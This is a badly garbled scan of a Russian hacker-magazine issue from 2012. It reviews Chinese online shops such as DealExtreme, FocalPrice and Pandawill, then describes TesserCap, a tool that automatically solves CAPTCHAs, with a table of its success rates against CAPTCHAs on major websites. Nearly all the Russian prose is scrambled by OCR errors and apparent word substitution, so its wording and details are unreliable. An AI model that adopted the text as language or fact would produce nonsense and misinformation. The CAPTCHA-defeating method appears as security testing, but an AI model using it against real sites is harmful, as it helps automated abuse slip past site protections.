Или осциллограф? Или, ко примеру, лазер? А запчасти интересах разбитого смартфона? Да немного погодя же, идеже да десятки тысяч других самых разных

товаров, которые во огромных количества х штампуются во Поднебесной, -в китайских интернет-магазинах. И, зачем важно, в области самым доступным ценам .

MADE IN CHINA Три знакомых пустозвонство

что касается нескольких изо них- тех, со которыми имел

<<Made in China >>

века

обос н авались возьми что до гр ом н ом количестве все­

профессия либо автор этих строк сам, либо мои др узь я. Сразу хочу предупредить, сколько коллекция магазина- злоба дня

возможных товаров, во особенности возьми технике.

субъективный. Перед каждый покупкой обяза­

Гл у согласно было бы загадывать , который неподалёку вместе с про­

тельно возможно отзывы равно имей во виду- однако гда

изводством безграмотный появятся огромные интернет­

снедать отнюдь не которая вероятность, что-нибудь посыл

магазины, идеже всё сие д обро допускается дать на лапу

потеряется , почто изделие окажется бракованным,

соответственно максимально ни зкой ц ене. Д умаю, многие

зачем на коробку положат черт знает что малограмотный в таком случае сиречь соберут

слышали что до особо раскрученном магазине

коллекция никак не полностью- такое иногда

-

DeaiE xtгeme.com, - хоть разве е щ е синь порох

везде, минуя исключений. Н по части вслед за те цены, которые

на н ем далеко не заказывали. Н что до подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня пишущий эти строки хочу оповестить

вам из сим мириться. П риступ им?

ХАКЕР

03/158/ 0012

'


В небесная империя следовать пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не для того всех товаров]

Q :zo М 02. S

.............

с 04 до самого 05 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Вотан изо лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает побольше 00 000 наимено­

013 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров на едва 000 категориях [гадже­ ты , аксессуары для ним равно приблизительно далее] . По край­ н ей мере, приближенно возлюбленный самовольно заявляет. Проверить эти данные сложно, только то, что-то после этого дозволяется выискать

~

самого черта,- сие точно. В ассортименте

./

возвращение стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 08Dдней

[ох олигодон сии китайцы], телефоны равно оргтехника

во теценне

00 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

тотально приемлемого качества [судя равно сообразно лич­ ному опыту, да согласно отзывам] .

Комn1>10теры да конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 0'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 0Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, что такое? привлекло меня быть знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ ко :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве со магазином, - сие цены. У некоторых

товаров они были ниже, нежели получай еВау [да-да, китайцы продают порядочно своего товара

сей раздел может служи ть <<nесочницей>>,

равным образом получи западном аукционе, же автор сих строк оный миг

идеже дозволяется дать на лапу прикольную мелочевку

Впрочем, доставка, вроде да везде, может затя­

исследовать безвыгодный будем]. Как оказалось поз­

равным образом приглядеться для сервису, никак не тратя значи­

нуться. Обычно посыл подле хо дит никак не первоначально ,

же, достижимость слупать соответственно ценам вниз

мых сумм.

нежели путем двум недели. Если твоя милость сделаешь за­

Каждый третьяк имеет описание, рейтинги

рыночных обусловлена территориальной бли­

по образу у почти не всех магазинов такого плана.

каз с гаком $20, в таком случае <<Фокал>> предупредительно привяжет

зостью магазина для заводам -изгот овителям.

равным образом отзывы, которые помогут произвести сортировка .

ко твоей посылке трек-номер чтобы отслежива­

Более тог о, «Фока л >> на весь народ предлагает

Для оплаты позволительно пускать в дело PayPal.

ния статуса работа .

перестать бери форуме магазина известие

С недавних пор FocaiPrice стал предполагать

по части том, ась? твоя милость сделал какой-либо с това-

да

WebMoney, а сей поры безвыгодный к всех товаров .

В целом средство оставляет приятное впе­ чатление , но, клеймящий по части отзывам, равно возлюбленный безграмотный лишен

овраг дешевле,- на таком случае стоимость полноте

Магазин сплошь и рядом проводит отличаются как небо и земля акции,

во сех тело дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям равным образом доступен

а на некоторых предложений лакомиться ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых не возбраняется разыскать

ветствие характеристикам.

отсортированы соответственно ценам, начиная ото одного

во интернете.

доллара. Для сомневаю щихся другими словами новичков

Что касается доставки, ведь симпатия бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- сие отличная осуществимость сберечь каплю денежек . Причем обрести адрес купона

капли далеко не сложно: их раздают получи и распишись сайтах может статься гeta il menot . com [крупнейший, да англоя зы чный ресурс] , chinaprices.гu , а как и во темат ических сообществах . В конце концов, дозволено банально вбить во искатель <<куnон бери скидку <ИМЯ магазина»> .

0. Чтобы бегом обнаружить захватывающий тебя залежь равно найти сходство цены, дозволено nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой а услуги снедать равным образом сверху сайте ch i napгices.гu .

0.

Перед покупкой невыгодный поленись полазать в соответствии с форумам, nочитать информацию насчёт волюм другими словами ином магазине- сие может сильно nомочь . Изучай nлощадки. Изучай, изучай да снова в один из дней изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

01

Бижутерия

а

Товары для того

I!J

Товары пользу кого

автомо

иля

здоровья

детеи

~

u ~

0 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков без дальних слов сколько угодно - для примеру, форумы ebay-foгum.гu равно mySku.гu .

0.

Если глядишь произошла какая-то погрешность [допустим, nри в рассуждении тправке , доставке] другими словами кушать вопросы по ассортименту- малограмотный стесняйся черкать во поддержк у. В делавар е некот орых магазинов пусть даже есть русскоговарящие сотруд ники.

0.

При оплате заказа нужно исnользовать только лишь nроверенную платежную систему. В глоссалгия шин стве случаев сие

PayPal . Некоторые китайские магазины поддерживают WebMoney да аж Qiwi, но, PayPal- они оче нь сподручно умеют постановлять проблемы

тем далеко не менее, автор рекомендую утилизировать

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

от нерадивыми продав цами.

0.

Терnение, терnение равным образом сызнова разок терnение. Заказывая при помощи интернет, н ужно составлять готовым

Qiwi

подождать. Заказ могут до второго пришествия формировать, медленно отправлять, а а там препятствовать получи таможне

иначе говоря в каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 0012

Кредитные игра в карты

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

01

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 00 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

00 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой первоначальный компетенция покупки во китайских

~.,

интернет-магазинах моя особа секс учил вот поэтому и есть здесь.

......

-·-·--

Чего пишущий эти строки всего-навсего никак не заказывал: да защитные

пленки, равно батарейки, равным образом фонарики, да планзифтер для телефона, да всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать тута особенно равно нечего: нынешний источник

сейчас опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 05 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные на астрономических количествах равным образом согласно бог

привлекательным ценам. Е сть двухдолларо­ вая область на мелочевки, разделы новинок

Отследить отбывание не возбраняется до тр ек-номеру,

равным образом вместе с пецпредложений . Аналогично TiпyDeal ,

какой предоставляется бескорыстно пр равным образом за­

средство предлагает приобретать да накоплять

казе от бога

бонусные баллы, п убликуя описания или — или видео

равно отзывы держи форумах, позволено резюмировать:

не запрещается быстрее, ведь вернее обратиться

ко товарам. Выполнить оплату давальщик может

D ealextгeme- аристократический магазин, у которого

другим ресурсом, особенно сие касается людей,

сквозь

сумме единовластно недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку позволительно до второго пришествия лишше месяца!,

ничеством!.

Pa yPa l

тож от п омо щью кредитной картеж ,

подле этом после доставку десятая спица ни аза неграмотный возьмет.

$15. Учиты вая

настоящий квалификация

который связано не без; громадным числом заказов .

Итог: единственный изо самых раскрученных мага­ зинов. Но неравно тебе нужно унаследовать изделие равно как

"

Tinydeal.com ';..[

насчёт

0 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 0 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

0 ДО 05

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и воз самых разных товаров , вдобавок

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

отдельный месяцок появляется изрядно тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги да отзывы, а кое-когда видео равным образом русскоязычные коммен­

тарии. Порадовал опять же онлайн-чат, идеже я смог бегло выудить ответы возьми интере­ сующие меня вопросы, притом получай русском

языке. На сайте снедать раздел спецпредло ­

дарков. Помим насчёт

жений от еженедельными скидками, а в свой черед

ются кредитные карточная игра равным образом WеЬМопеу. Впро­

ко товаров, так на получения нечистая сила платн ого

пятидолларовая диапазон чтобы мелких товаров.

чем, пишущий эти строки постоянно так же настырно рекомендую

треки н г-номера такса хо тя бы одного изо них

Цены сильнее нежели приемлемые , точный

вести всегда торговые связи от

винтернетеможно откопать купоны нате скидки

сильнее надежно, полегчало опровергнуть транзакцию .

должна бытийствовать за пределами $20. В противном случае за треки н г придется приплатить $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему снедать воз­

К тому а бери оплату картами в тот же миг д ейству­

моей покупкой на этом магазине был телефон,

можность за купать вещи из-за баллы [так

ет приостановление во $150.

равно всё выздороветь на правах запрещено лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

ко оплате принима­

PayPal-

зто

Доставка во любую точку таблица бесплатна.

одиночный нюанс: разве на тво ем заказе несколь-

Вывод: по части тличны й лабаз не без; широким ас­

вслед за публикацию комментариев равно обзоров .

Посылка идет, вроде равно везде,две-три недели [бы­

сортиментом, адекватные стервис да поддерж­

Приятный бонус- возле заказе получи и распишись сумму

вает, ась? доходит равно вслед неделю, да сие доводится

ка - например, даже если рядом получении по какой-то причине

с гаком

редко!. Трек-номер для того отслеживания посылки

никак не хватает, в таком случае по прошествии обращения общепринято безо

выдается подле заказе сверху

проблем высылают недостающее .

$200

тебе предложат прибрать единодержавно

изо нескольких возможныхнебольших немного

01,0

$35, а шелковица кушать

ХАКЕР

03/158/2012


В небесная империя из-за покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 0'8g1stor

n

Поисхаn. мсь мага1мн 0Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

с 05 впредь до 05 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 0 USD

&'М

live

0611 коо,..а(О)

-

0р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще сам непривычный интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый скудно ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, возьми мои взгляд, гостиный двор максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 003 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован для того русскоговарящих покупате­

лей. Судя по мнению отзывам, се г одня дьявол единовластно с лиде­

В се насчёт

последних

буерак в соответствии с числу продаж на страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен предприимчивый русскоязычный раздел, а супрефект магазина не раз

Вынrраrь

встречается из потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

получи тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- меньший ассор ­

Популярные вещи

тимент телефонов (в фолиант числе да со после косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

почти популярные марки ! . Вотан мои знакомый при обрел на Pa ndawill духовное лицо уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 0GB 0GB RАМ

мо д ел ь телефона равно остался доволен равно как самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а ко равным образом быстрой д оста во кой, кото раиса

заняла просто-напросто цифра дн ей. Советую безвыгодный забыть про раздел распродаж- вслед за тем мол йствительно

позволено разыскать ахти дешевые т овары . Оnлата через PayPal да ли картами Visa да Master Сагd,

предоставления бесnлатного трек-номера: его

вдобавок позволительно секс учит ь заметную ски дк у

не запрещается нахватать исключительно nри заказе сверху сумму

пассаж про русскоязычного пользователя,

в соответствии с купону. До размер буд е т бесплатной. Един­

из выш е $50 (тут в соответствии с сравнению со конкуре нтам да

добро бы равным образом отнюдь не со самыми ни зкими ценами сверху попу ­

стве нное, зачем ми безграмотный понравилось,- усишко л овие

« Панда >> открыто проигрываетl.

лярные товары.

Общее впечатлени е: будь-будь сложный

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

с

Срок доставки:

с

~Е] fj

0

0 давно 05 дней

Категориитоваров: m~во -

04 впредь до 05 дней

Способы оплаты:

PayPal· -

Срок доставки:

с

0 перед 05

дней

Многие семя успешно nриобретали во этом

Интернет-магазин ото предприимчивы х

Порадовала шибко быстрая lи, кстати,

магазине планшеты да оставшиеся гаджеты ,

американцев. Посылки приходят изо Китая ,

бесnлатная) снабжение , особенноучитывая

только у меня был мрачный опыт: заказав

хотя бы на поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

да оплатив телефон, моя персона получил шаблон от

Заказывал у ни х объединение мелочи- наволока , ЗG-модем

сайт отнюдь не уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

равным образом стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

равно невыгодный того цвета . Печален пусть даже неграмотный непосредственно бесспорно

китайского магазина, выплата после PayPal да бесплатная подкатка nрисутствуют,

бы не. зто, ведь спецмагазин занял бы достойное

отnравки безграмотный пирушка модели, а то, ась? однако попытки как-то постановить проблему невыгодный увенчались

хотя nосылки отправляют обычной почтой да лишенный чего

да TinyDeal .

успехом. Возможно , посредством

трекинга .

PayPal

было бы

поле недалеко вместе с моими фаворитами FocaiPгice

уймись начинать диспут, хотя никак не факт.

ЗАКЛЮЧЕНИЕ

не возбраняется сберечь . Если залежь минуя отзывов­

обращайся во службу поддержки. Н е забывай :

В заключен равным образом е хочетс ваш покорнейший слуга давно ба скручивать , сколько об дин равным образом оный

всенепременно уточняй комплек тацию равным образом харак­

китайские интернет-магазины чуть на тех,

а рестант может бытовать изумительный многих магазинах,

теристики : на каждом слове присылают что-то отличное

который может ожидать . Е сли зачем -то нужно на этом месте равно

да по мнению разным ценам. П озтому поначалу сравни

через указанного на описании. Чтобы максимально

сейчас, в таком случае отличается как небо через земли семо инда далеко не заглядывать. И

равно всего впоследствии совершай заказ. Не поленись

упасти себя, оплату л у чше пров одить

становой хребет правило: тот, который ищет, ввек найдет.

пошакалить во Сети куnоны получи скидку, не без; ними

посредством PayPal. В случае проблем бесспорно

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 0gursev.kal ra!a foundstone .com 0

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы с целью обхода САРТСНА, которыми защищены с а й твоя милость . Во - первых , будучи от твуют с п е ц равно альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» с

#1 05

да

#126

Р искусник п озна на а н ие СА Р ТС Н А - проблема чаще во сей

номеров соответс т венно. Сегодня но автор этих строк хочу

нетривиальна моя персона . Н а вид делать нечего

ра сс показывать тебе в отношении разработке TesseгCap, ко т в отношении ­

укладывать массу присест л ичных фильтров, что­

рую ав т гомон называет универсальной решалкой

бы упрятать искаже н ия равно п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, наравне ни кру т и.

работчики желают закрепить прочность вслед щ равным образом т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

для оторые да спользуют третьесортный

Зач а стую п риходится реализо на ыват ь обучае ­

ручно й вещь равно бу для вально вслед за $1

мую сис т ему для ос н ове нейронных сетей [зто,

Ч так из д елал виновник п ро г раммы? О н посмотре л ,

предлагают постановить

для слову, никак не таково со л ожно, наравне може т показа ть­

равно как как всегда подхо д ят для п р облеме автоматизи­

ся], в надежде д обиться п р иемлемого результ а т а

ро на ин н ого решения СА Р ТСНА равным образом по части п робовал

за ав т оматизиро во анному р ешению капч. Ч тоб ы

подвести итог данный компетенция на насчёт д ном равным образом н струмен т е .

понять, что до нежели ваш покорнейший слуга говорю, лу чш е п что касается д нят ь крайне во

Автор заметил, который чтобы удаления ш умов из из ­

0000

капч.

В ко ачестве альтернативы м относительно ж н по части узнать на своем опыте написать и нтелле для туальную из равно стему,

равно прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т по отношению ест ь реше н ия самой слож н ой

САР Т С Н А: теорийка да прак т ика. Р азбираемся,

задачи близ распознавании капч, чаще постоянно г по части

вроде л омают ка п чи» равным образом << П касательно д смо т рим равно рас п озна-

применяются одни да те а фильтры. П олучает-

котофей орая по части опред е ленным

алгор да т м а м полноте сама выполнять щупанье .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее в эту пору дозволительно

HMLR

р е ал с ова т ь из по мнению м ощью

из пец равно альной утилиты .

01,2

С хема анализа САРТСНА- изображени й со через

TesserCap

ХАКЕР

03/158/2012


Проверка бери устойчивость

вместе с я, аюшки? коли исполнить спокойный инструмент, позволяющий минус сложных математических

~ ~-

.....

-

преобразований складывать фильтры нате из ­

[: 0152\4'] ~ ~~-- ·::

бражения, да смешать его не без; ОСR-системой

-

- -

... _

радикально работоспособную оборона грамму. Это, с обстве нн о, равным образом есть Гурсев Сингх Калра

с компании

McAfee. Зачем

--·==

... 0

L41 ~2~

к распознавания текс т а, т в рассуждении дозволено выудить

з т об было нужно?

0

01~2\А

Автор утили т ы решил таким об крата ом про­

\ 'О=

верить, сколько безопасны капчи ко рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 0

~- ,------

""---""""""""'

Wiilli)

по отношению

-

.

.

0 ~- 0 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

01~

l ~k l 0 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

005Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная пропуск изображений равным образом да з страсть

Кандидатами нате соучастие на т естировании стали

текста изо капчи

Wikipedia,

еВ ау, а опять же

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

01 о 1 0" liJ G 1 0 ~269

посещаемыми в соответствии с версии известного сервиса

такие монстры, что

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru от предварительной обработкой изображений . Судя соответственно результатам, фильтр подобрать неграмотный посчастливилось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно по части определять ценность результаты рас до з нав а н ия

статут функционирования программы, т касательно в рассуждении н

стает расстояние со тре мя вкладками:

изображений, насчёт тм етив и оный и другой с них во вкусе

довольно прост. Исходная капча поступает

lmage

во систему предварительной обработки изо­

заключает простейшие положения управления, которые

няя, в особенности значимая цель служит про

бражений, очищающей нарост говорят с всяких шумов

исnользуются чтобы зап у ска да остановки теста

передачи любого изображения на систему nред­

равно искажений равным образом по мнению конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, во которой задается

лученное образ ОСR-системе, которая

ти стики т еста !сколько отга дан о, а насколько

фильтр, удаляющий со изображения шумы равным образом ис­

вместе с тарается различить подтекстовка возьми нем . TesseгCa p

нетl, навиг а ци равно равно выбора изображения для того

каже ния. Чт обы делегировать погрузчик т инку на сис т ему

имеет диалоговый графиче ский интерфейс

предварительной обработки. В раздолье чтобы ввода

предварител ьн ой обработки, нате д в отношении прикокнуть

да обла правда е т следующими свойст во ами :

URL-aдpeca долженствует бытовать указан полный

возьми требуемом изображении nравой кноnкой

Е сли считать на об щишки х ряд х

0.

0.

0.

Ma in, Options,

P гepгocessing. Основная супинатор

коррек т н ы й или — или нетактичный . Н у да послед­

URL-

Имеетуниверсальную систему пре двар да ­

aдpec, тот или другой веб-приложение использует

мыши равным образом во кон т екс т ном список наметить параграф

тельной обработки изображений, которую

к извлечения капч. URL-aдpec позволено по­

Send

не грех возьми созидать пользу кого каждой отдельной

л вколачивать следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

ко н что касается nко й мыши

Включает во себя сис тем у распознавания

передразнить сиречь прошляпить адрес страницы

Вкладка что касается пци й со д ержит непохожие злементы

Tesseгact, которая извлекаеттекст с пред­

равно извлечь URL-aдpec с атрибута sгс тега из ­

уnравления к конфигурирова ния TesseгCap.

варительно проанализированного равно под­

бражения

Здесь дозволено облюбовать ОСR-систему, ради д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто ячейка www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name=xakep . гu . Ряд ом со стро-

сацию равным образом предварительную обработку изобра­

ко дир овок на системе распознавания .

ко ой а др еса находится элеме нт, задающий

а ни й, прибросить пользовательские НТТР­

для оличество капч, которые н ужно использовать

ради головки , а да направить диапаз в отношении н символов

Думаю, универсальный ум понятен, поэто м у

интересах тестирования. Та для как бы использование может

на системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, на случае из

xakep.

предлагаю посмотреть, во вкусе сие выглядит .

наряду из этим nоказывать всего

Универсал ьн волос утилиты н е могла безвыгодный приве­

б р ажений, во нем предусмотрены начатки

сти ко усложнению ее интерфейса, п оэтому ок н об

у пр авления в целях постраничного п ролистывания

программы может вв ести во мелкий из т у пор .

загружен ны х нарост ч . Та ким образом, рядом мас­

02

изо­

величина веб-прокси, аннексировать nереадре­

на нижнем регистре, буквы на верхнем регистре , сnециальные символы.

Теперь по отношению каждой оnции поподробней . Пр ежонок д е всего, дозволительно выкроить ОСR-систему.

Так что, накануне т ем равно как п ереходить н е п ос ред­

штабном тестировании да мы от тобой сможем nроли­

П об умолча нию д оступна всего лишь одна ­

ствен н об для ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр обследовать

Te sseгact -ORC , круглым счетом в чем дело? замора чивать ся

разобраться со ее интерфейсом равно заложенным

результаты их распознавания. Кнопки Staгt

от выбором т ут никак не придется. Еще одна ужас

функциона л ом.

равным образом

интересная реальность программы- вы­

Stop запускают

равным образом оста н ав лива корма тестиро­

вание соо тветствен но. По вместе с ле те из т ирования

лес диапазона символов . Возьмем, напри­ мер, капчу не без; xakep . гu- видно, что-нибудь возлюбленная никак не со­

д е ржит н равным образом одной букв ы , а состои т т насчёт льк о из цифр. Так дьяволом нам лишние символы, которые исключительно увеличат вероятие никак не кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни ко чему, посему быть тестировании капчи

xake p.гu полегче указать, в чем дело? симпатия содержит Мы никак не могли отнюдь не высказать х отя бы туман слов об

Подразделение профессиональны х услуг

относительно отрезок времени цифры: Num eгics. Но ась? коли найти

авторе замечательной утилиты TesseгCap .

FoundstoneФ, на котором симпатия трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные обслуживание равным образом обучение,

п ознать капчу, состоящую с заглавных букв

главным консультантом на подразделении

обесnечивает nостоянную равным образом действенную

любого языка? Н ет, малограмотный сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов через самых серьезных угроз.

рет роспись символов, используемых с целью рас­

во х одит на количество

Команда nодразделения nрофессиональны х

познавания, изо конфигурацио нны х файлов,

услуг состоит с признанных экспертов

находящихся на \Ргоgгаm

во области безоnасности равно разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал в таких конференциях, вроде Тоог­ Соn ,

NuiiCon

равно

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap да SSLSmaгt . Помимо

имеющих зажиточный оnыт сотрудничества

П оясню для прим ере : когда я выбрали

сие го , разработал малость инструментов ради

вместе с международными корnорациями

опции Numeгics равным образом L oweг

внутренних нужд комnании . Любимые языки

да государственными организациями

обратится ко файлу loweгпumeгic, начинаю­

по мнению воnросам безоnасности .

щ емуся не без; параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 0012

Ruby, Ruby on Rails

да С#.

Case,

в таком случае пр ограмма


PCZONE За ним подобает меню символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут прилагаться в целях решения капчи.

PREPROCESSING

По умолчанию во файлах содержатся лишь

Н у видишь наш брат да добрались вплоть до самой интересной

буквы латинского алфавита, что-то около что-нибудь интересах рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы требуется променять другими словами

про у д а л е н ия от капч различных шумов да раз­

мытий, которые стараются максимально

прибавить наличность символов.

Теперь маленечко относительно том, чтобы в чем дело? нужно поле

Http Request

Headeгs. Например, для не­

Процесс настройки универсального фильтра предельнопрости состоит изо девяти буква п ов.

того с тем отведать капчу. Чтобы TesseгCap

Изменения изображения отображаются держи

смогла извлечь посещение для капче, программе

каждом этапе предварительной обрабо т ки.

ничего не поделаешь делегировать на запросе НТТР такие

Кроме того, держи странице переводу нет компо-

заголовки, равно как Ассер!,

нент проверки, кто позволяет дать оценку

равно Rеfеггег

да т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs равно т. д.l, можно перехватить посылаемые заголовки запро­

са равным образом установить их на пашня ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- сие

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

00-30%

ЕЬау

00-30%

reddit.com

00-30%

CNBC

>50%

foodnetwoгk.com

00-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи быть

Http Request

Follow

САЙТАХ

затруднить задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, про

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

0.

Инверсия цвета

Дело на том, ась? TesseгCap соответственно умолчанию

пикселей пользу кого САРТСНА-изображений. Код,

неграмотный долженствует переадресации. Если отладочный

состроенный ниже, демонстрирует, на правах сие

pasteЬin.com

00-80%

URL-aдpec потребно за мною переадресации

происходит:

cavenue.com

>80%

пользу кого получения изображения, нужно выбрать эту опцию.

Ну равно осталась последняя опция, вклю­

чающая/отключающая прибор предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная манипуляция изображений отключена. Пользователи на первых порах настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты пользу кого всех пикселей изображения.

{

Каждое числовое равнина может иметь на иждивении

